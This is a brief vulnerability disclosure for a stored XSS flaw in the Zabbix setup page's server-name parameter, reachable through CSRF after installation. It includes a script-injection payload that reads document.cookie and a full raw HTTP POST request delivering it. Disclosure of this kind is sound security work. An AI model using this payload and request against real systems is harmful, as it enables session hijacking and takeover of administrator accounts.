There is a Stored XSS vulnerability in Server name parameter

This parameter is specified during the initial setup, but since the /zabbix/setup.php still available after the setup and there is no protection against CSRF attacks, malicious attacker could convince Admin to execute the script via CSRF Attack

Vulnerable parameter is zbx_server_name
Example vector: </title><script>alert(document.cookie)</script>

Example request for setting up the Server name will be:
POST /zabbix/setup.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/zabbix/setup.php
Cookie: PHPSESSID=o7ok9rtqm50o0hptmppoqljen4; zbx_sessionid=da206dbd3fb3f8cb5dff506c773bd4e0; tab=2
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 184

sid=5dff506c773bd4e0&form_refresh=1&zbx_server=localhost&zbx_server_port=10051&zbx_server_name=%3C%2Ftitle%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&next%5B3%5D=Next+step